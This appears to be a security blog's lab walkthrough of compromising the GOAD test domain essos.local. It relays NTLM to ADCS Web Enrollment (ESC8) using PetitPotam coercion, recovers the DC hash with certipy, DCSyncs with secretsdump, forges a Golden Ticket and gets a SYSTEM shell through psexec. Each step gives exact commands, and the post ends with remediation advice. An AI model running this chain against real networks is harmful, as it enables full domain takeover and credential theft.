Coercion to Domain Admin via ADCS Relay

Published by Matt Clemons on

This walkthrough shows how a single unauthenticated coercion flaw turned into full domain compromise in the ESSOS GOAD domain. No creds. No phishing. Just bad defaults and missing protections.

Phase 1: Recon and Target Identification

A basic nmap sweep of the subnet surfaced two high value systems:

  • 10.3.10.12 (MEEREEN)
    Domain Controller for essos.local.
  • 10.3.10.23 (BRAAVOS)
    Exposed HTTP service. Identified as ADCS Web Enrollment.

Phase 2: Coercion via ESC8 and PetitPotam

BRAAVOS had ADCS Web Enrollment enabled over HTTP with no NTLM relay protections. That makes it vulnerable to ESC8.

Plan:

  1. Relay incoming NTLM auth to the ADCS endpoint.
  2. Coerce the Domain Controller into authenticating to me.
  3. Request a certificate for the DC machine account.

Relay Setup

impacket-ntlmrelayx \
  -t http://10.3.10.23/certsrv/certfnsh.asp \
  --adcs \
  --template DomainController

Trigger the Coercion

python3 PetitPotam.py 10.3.10.210 meereen.essos.local

Result:

  • MEEREEN$ authenticated to my Kali host.
  • NTLM was relayed to ADCS.
  • The CA issued a Domain Controller certificate.

Output artifact: MEEREEN.pfx.

Phase 3: Turning a Certificate into Domain Secrets

Certificates are useful. NT hashes are better.

Using Certipy, I authenticated with the PFX and extracted the DC machine account hash.

certipy-ad auth \
  -pfx MEEREEN.pfx \
  -dc-ip 10.3.10.12

Recovered hash:

MEEREEN$:38506151444e193264ea4339705cee86

With a DC machine hash, DCSync is trivial.

impacket-secretsdump \
  -hashes :38506151444e193264ea4339705cee86 \
  'essos.local/MEEREEN$@10.3.10.12'

Phase 4: Persistence via Golden Ticket

Using the krbtgt hash, I forged a Golden Ticket that asserts Domain Admin privileges and remains valid for years.

impacket-ticketer \
  -domain essos.local \
  -domain-sid S-1-5-21-2003082546-1317317289-410609582 \
  -nthash 8c000bd84915502355f775cf75de84d7 \
  Administrator

This ticket does not expire in any meaningful operational sense unless krbtgt is rotated twice.

Phase 5: SYSTEM Shell on the Domain Controller

Load the forged ticket and authenticate over Kerberos. No passwords required.

export KRB5CCNAME=Administrator.ccache
impacket-psexec essos.local/Administrator@meereen.essos.local -k -no-pass

Why This Worked

  • ADCS Web Enrollment exposed over HTTP.
  • NTLM relay protections not enforced.
  • Unauthenticated MS-EFSRPC reachable.
  • No SMB signing enforcement.
  • No EPA on ADCS endpoints.

Any single control would have broken the chain.

Remediation Guidance

For defenders and administrators:

  • Enforce SMB signing
    Prevents NTLM relay outright.
  • Harden ADCS
    Disable HTTP Web Enrollment.
    If required, enforce HTTPS, enable EPA, and restrict templates.
  • Block MS-EFSRPC coercion
    Filter or restrict unauthenticated access to the EFSRPC interface.
  • Audit ADCS usage
    Treat certificate services as Tier 0 infrastructure.
Categories: Security

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Security

GOAD Compromise Part 3: Total Forest Takeover

In Part 2, we gained SYSTEM on WINTERFELL and minted a long lived Golden Ticket for the child domain. We have total control of North, but in an Active Directory forest, the Child Domain is Read more

Security

GOAD Compromise Part 2: System to Golden Ticket

In Part 1, we set the stage. Now we turn that control into dominance. The goal here is simple. Move from a compromised machine account in the child domain north.sevenkingdoms.local to full Enterprise Admin access Read more

Security

GOAD Compromise Part 1: Enumeration

We have access to the network, but no understanding of the environment. The next step is to enumerate and map what exists. Phase 1: Infrastructure Mapping (Nmap) We start by figuring out what actually exists Read more